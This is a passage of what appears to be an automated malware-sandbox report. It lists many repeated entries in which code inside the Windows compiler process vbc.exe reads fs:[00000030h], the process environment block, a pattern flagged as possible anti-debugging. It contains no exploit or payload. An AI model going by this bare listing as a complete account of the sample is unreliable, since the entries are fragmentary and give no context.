Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05815702 mov eax, dword ptr fs:[00000030h] 5_2_05815702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05815702 mov eax, dword ptr fs:[00000030h] 5_2_05815702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584C700 mov eax, dword ptr fs:[00000030h] 5_2_0584C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05810710 mov eax, dword ptr fs:[00000030h] 5_2_05810710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05840710 mov eax, dword ptr fs:[00000030h] 5_2_05840710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584F71F mov eax, dword ptr fs:[00000030h] 5_2_0584F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584F71F mov eax, dword ptr fs:[00000030h] 5_2_0584F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05813720 mov eax, dword ptr fs:[00000030h] 5_2_05813720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582F720 mov eax, dword ptr fs:[00000030h] 5_2_0582F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582F720 mov eax, dword ptr fs:[00000030h] 5_2_0582F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582F720 mov eax, dword ptr fs:[00000030h] 5_2_0582F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CF72E mov eax, dword ptr fs:[00000030h] 5_2_058CF72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584C720 mov eax, dword ptr fs:[00000030h] 5_2_0584C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584C720 mov eax, dword ptr fs:[00000030h] 5_2_0584C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D972B mov eax, dword ptr fs:[00000030h] 5_2_058D972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05809730 mov eax, dword ptr fs:[00000030h] 5_2_05809730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05809730 mov eax, dword ptr fs:[00000030h] 5_2_05809730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05845734 mov eax, dword ptr fs:[00000030h] 5_2_05845734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h] 5_2_058EB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h] 5_2_058EB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h] 5_2_058EB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058EB73C mov eax, dword ptr fs:[00000030h] 5_2_058EB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584273C mov eax, dword ptr fs:[00000030h] 5_2_0584273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584273C mov ecx, dword ptr fs:[00000030h] 5_2_0584273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584273C mov eax, dword ptr fs:[00000030h] 5_2_0584273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0588C730 mov eax, dword ptr fs:[00000030h] 5_2_0588C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581973A mov eax, dword ptr fs:[00000030h] 5_2_0581973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581973A mov eax, dword ptr fs:[00000030h] 5_2_0581973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05823740 mov eax, dword ptr fs:[00000030h] 5_2_05823740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05823740 mov eax, dword ptr fs:[00000030h] 5_2_05823740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05823740 mov eax, dword ptr fs:[00000030h] 5_2_05823740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E3749 mov eax, dword ptr fs:[00000030h] 5_2_058E3749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584674D mov esi, dword ptr fs:[00000030h] 5_2_0584674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584674D mov eax, dword ptr fs:[00000030h] 5_2_0584674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584674D mov eax, dword ptr fs:[00000030h] 5_2_0584674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05810750 mov eax, dword ptr fs:[00000030h] 5_2_05810750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852750 mov eax, dword ptr fs:[00000030h] 5_2_05852750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852750 mov eax, dword ptr fs:[00000030h] 5_2_05852750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05894755 mov eax, dword ptr fs:[00000030h] 5_2_05894755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h] 5_2_0580B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h] 5_2_0580B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h] 5_2_0580B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580B765 mov eax, dword ptr fs:[00000030h] 5_2_0580B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05818770 mov eax, dword ptr fs:[00000030h] 5_2_05818770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05820770 mov eax, dword ptr fs:[00000030h] 5_2_05820770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589368C mov eax, dword ptr fs:[00000030h] 5_2_0589368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589368C mov eax, dword ptr fs:[00000030h] 5_2_0589368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589368C mov eax, dword ptr fs:[00000030h] 5_2_0589368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589368C mov eax, dword ptr fs:[00000030h] 5_2_0589368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05814690 mov eax, dword ptr fs:[00000030h] 5_2_05814690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05814690 mov eax, dword ptr fs:[00000030h] 5_2_05814690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584C6A6 mov eax, dword ptr fs:[00000030h] 5_2_0584C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580D6AA mov eax, dword ptr fs:[00000030h] 5_2_0580D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580D6AA mov eax, dword ptr fs:[00000030h] 5_2_0580D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058076B2 mov eax, dword ptr fs:[00000030h] 5_2_058076B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058076B2 mov eax, dword ptr fs:[00000030h] 5_2_058076B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058076B2 mov eax, dword ptr fs:[00000030h] 5_2_058076B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058466B0 mov eax, dword ptr fs:[00000030h] 5_2_058466B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h] 5_2_0581B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h] 5_2_0581B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h] 5_2_0581B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h] 5_2_0581B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h] 5_2_0581B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581B6C0 mov eax, dword ptr fs:[00000030h] 5_2_0581B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h] 5_2_058D16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h] 5_2_058D16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h] 5_2_058D16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D16CC mov eax, dword ptr fs:[00000030h] 5_2_058D16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584A6C7 mov ebx, dword ptr fs:[00000030h] 5_2_0584A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584A6C7 mov eax, dword ptr fs:[00000030h] 5_2_0584A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CF6C7 mov eax, dword ptr fs:[00000030h] 5_2_058CF6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058416CF mov eax, dword ptr fs:[00000030h] 5_2_058416CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583D6E0 mov eax, dword ptr fs:[00000030h] 5_2_0583D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583D6E0 mov eax, dword ptr fs:[00000030h] 5_2_0583D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h] 5_2_058A36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h] 5_2_058A36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h] 5_2_058A36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h] 5_2_058A36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h] 5_2_058A36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A36EE mov eax, dword ptr fs:[00000030h] 5_2_058A36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058436EF mov eax, dword ptr fs:[00000030h] 5_2_058436EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058906F1 mov eax, dword ptr fs:[00000030h] 5_2_058906F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058906F1 mov eax, dword ptr fs:[00000030h] 5_2_058906F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0588E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0588E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0588E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0588E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0588E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CD6F0 mov eax, dword ptr fs:[00000030h] 5_2_058CD6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0588E609 mov eax, dword ptr fs:[00000030h] 5_2_0588E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05841607 mov eax, dword ptr fs:[00000030h] 5_2_05841607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584F603 mov eax, dword ptr fs:[00000030h] 5_2_0584F603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582260B mov eax, dword ptr fs:[00000030h] 5_2_0582260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582260B mov eax, dword ptr fs:[00000030h] 5_2_0582260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582260B mov eax, dword ptr fs:[00000030h] 5_2_0582260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582260B mov eax, dword ptr fs:[00000030h] 5_2_0582260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582260B mov eax, dword ptr fs:[00000030h] 5_2_0582260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582260B mov eax, dword ptr fs:[00000030h] 5_2_0582260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582260B mov eax, dword ptr fs:[00000030h] 5_2_0582260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05813616 mov eax, dword ptr fs:[00000030h] 5_2_05813616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05813616 mov eax, dword ptr fs:[00000030h] 5_2_05813616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852619 mov eax, dword ptr fs:[00000030h] 5_2_05852619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05846620 mov eax, dword ptr fs:[00000030h] 5_2_05846620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05848620 mov eax, dword ptr fs:[00000030h] 5_2_05848620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582E627 mov eax, dword ptr fs:[00000030h] 5_2_0582E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h] 5_2_0580F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h] 5_2_0580F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h] 5_2_0580F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h] 5_2_0580F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h] 5_2_0580F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h] 5_2_0580F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h] 5_2_0580F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h] 5_2_0580F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F626 mov eax, dword ptr fs:[00000030h] 5_2_0580F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581262C mov eax, dword ptr fs:[00000030h] 5_2_0581262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E5636 mov eax, dword ptr fs:[00000030h] 5_2_058E5636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582C640 mov eax, dword ptr fs:[00000030h] 5_2_0582C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D866E mov eax, dword ptr fs:[00000030h] 5_2_058D866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D866E mov eax, dword ptr fs:[00000030h] 5_2_058D866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584A660 mov eax, dword ptr fs:[00000030h] 5_2_0584A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584A660 mov eax, dword ptr fs:[00000030h] 5_2_0584A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05849660 mov eax, dword ptr fs:[00000030h] 5_2_05849660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05849660 mov eax, dword ptr fs:[00000030h] 5_2_05849660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05842674 mov eax, dword ptr fs:[00000030h] 5_2_05842674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05850185 mov eax, dword ptr fs:[00000030h] 5_2_05850185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CC188 mov eax, dword ptr fs:[00000030h] 5_2_058CC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CC188 mov eax, dword ptr fs:[00000030h] 5_2_058CC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589019F mov eax, dword ptr fs:[00000030h] 5_2_0589019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589019F mov eax, dword ptr fs:[00000030h] 5_2_0589019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589019F mov eax, dword ptr fs:[00000030h] 5_2_0589019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0589019F mov eax, dword ptr fs:[00000030h] 5_2_0589019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05867190 mov eax, dword ptr fs:[00000030h] 5_2_05867190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580A197 mov eax, dword ptr fs:[00000030h] 5_2_0580A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580A197 mov eax, dword ptr fs:[00000030h] 5_2_0580A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580A197 mov eax, dword ptr fs:[00000030h] 5_2_0580A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h] 5_2_058C11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h] 5_2_058C11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h] 5_2_058C11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h] 5_2_058C11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582B1B0 mov eax, dword ptr fs:[00000030h] 5_2_0582B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E51CB mov eax, dword ptr fs:[00000030h] 5_2_058E51CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D61C3 mov eax, dword ptr fs:[00000030h] 5_2_058D61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D61C3 mov eax, dword ptr fs:[00000030h] 5_2_058D61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584D1D0 mov eax, dword ptr fs:[00000030h] 5_2_0584D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584D1D0 mov ecx, dword ptr fs:[00000030h] 5_2_0584D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E61E5 mov eax, dword ptr fs:[00000030h] 5_2_058E61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058351EF mov eax, dword ptr fs:[00000030h] 5_2_058351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058151ED mov eax, dword ptr fs:[00000030h] 5_2_058151ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058401F8 mov eax, dword ptr fs:[00000030h] 5_2_058401F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BA118 mov ecx, dword ptr fs:[00000030h] 5_2_058BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BA118 mov eax, dword ptr fs:[00000030h] 5_2_058BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BA118 mov eax, dword ptr fs:[00000030h] 5_2_058BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058BA118 mov eax, dword ptr fs:[00000030h] 5_2_058BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D0115 mov eax, dword ptr fs:[00000030h] 5_2_058D0115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05840124 mov eax, dword ptr fs:[00000030h] 5_2_05840124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05811131 mov eax, dword ptr fs:[00000030h] 5_2_05811131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05811131 mov eax, dword ptr fs:[00000030h] 5_2_05811131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580B136 mov eax, dword ptr fs:[00000030h] 5_2_0580B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580B136 mov eax, dword ptr fs:[00000030h] 5_2_0580B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580B136 mov eax, dword ptr fs:[00000030h] 5_2_0580B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580B136 mov eax, dword ptr fs:[00000030h] 5_2_0580B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05809148 mov eax, dword ptr fs:[00000030h] 5_2_05809148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05809148 mov eax, dword ptr fs:[00000030h] 5_2_05809148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05809148 mov eax, dword ptr fs:[00000030h] 5_2_05809148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05809148 mov eax, dword ptr fs:[00000030h] 5_2_05809148
